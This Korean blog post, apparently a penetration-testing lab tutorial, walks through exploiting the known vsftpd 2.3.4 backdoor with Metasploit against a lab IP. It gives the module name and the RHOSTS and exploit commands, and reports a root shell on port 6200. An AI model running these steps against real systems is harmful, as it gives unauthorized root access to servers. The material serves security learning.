[Linux] Server-Side Attack으로 권한 취득하기 #1 (백도어 취약점 공격 / 원격 접속)
Nowhere 와 Now here 의 차이

IT/ㄴ Gaining Access

[Linux] Server-Side Attack으로 권한 취득하기 #1 (백도어 취약점 공격 / 원격 접속)

TIENE 2023. 7. 7. 20:22
반응형

- [Linux] Server-Side Attack의 시작 (정보 수집 / 취약점 검색) 를 이어서 본격적으로 진행한다.

- 이전 글에서도 정보 수집 취약점을 발견하여 액세스 권한을 얻었다.

- 이번엔 서비스의 백도어 취약점을 바탕으로 서버의 전체 액세스 권한 탈취한다.

 

[Server-Side Attack으로 권한 취득하기#1]


1. 서비스 취약점 검색

- vsftpd는 Very Secure File Transfer Protocol Daemon의 약자.

- 보안이 취약한 FTP에 보안을 추가한 파일 전송 프로토콜

- TCP/IP 프로토콜을 기반으로 데이터를 송수신

- 보안을 강조한 서비스이더라도 취약점은 존재할 수 있으니 해당 버전을 찾아보려고 한다.

 

- 검색 결과 vsftpd 2.3.4 버전의 배포판은 백도어가 존재했다.

 

 

[검색결과]

출처 : 위 링크

 

 

- Metasploit에서 모듈을 실행할 수 있도록 명령어를 기재해두었다.

출처 : 위 링크

 

 

2. Metasploit 실행 

- 각종 서비스 / 운영체제의 취약점을 갖추어 해킹 테스트를 돕는 도구

- 기본 명령어

1) msfconsole - 프로그램 실행
2) show [WORD] - 여러가지 정보 출력
3) use [취약점 이름] - 해당 취약점을 이용
4) set [NAME] [IP] -  [NAME]에 대한 [IP] 지정
5) expolit - 공격 수행

 

msfconsole

- 특정 그림이 나오면 정상적으로 실행한 것이다.

 

- 위에서는 적지 않은 명령어 search 다.

- metasploit 에 내장된 취약점들을 찾아볼 수 있다.

- 위에서 검색해본 vsftpd의 정보를 확인할 수 있다.

 

- 또 다른 명령어로는 info 다.

- 원하는 취약점에 대한 정보를 확인 할 수 있다.

 

use exploit/unix/ftp/vsfpd_234_backdoor

- 해당 취약점을 사용한다.

 

show options

- 취약점 선택 후 해당 취약점 관련 설정이 가능한 모드로 진입한다.

- 설정 전에 옵션들을 확인할 수 있다.

- RHOSTS에 공격 대상자의 IP를 설정해야한다.

 

set RHOSTS 192.168.111.131

- RHOSTS의 IP를 지정한다.

- show options로 다시 재 확인한다.

 

exploit

- 공격을 실행한다.

- 공격 실행 후, 셸을 찾았다는 이벤트 출력과 함께 vsftpd가 사용하는 포트 번호인 6200로 접속되었다.

 

- 접속 후, 완전한 권한(root 계정)을 얻었다.


300x250

 

반응형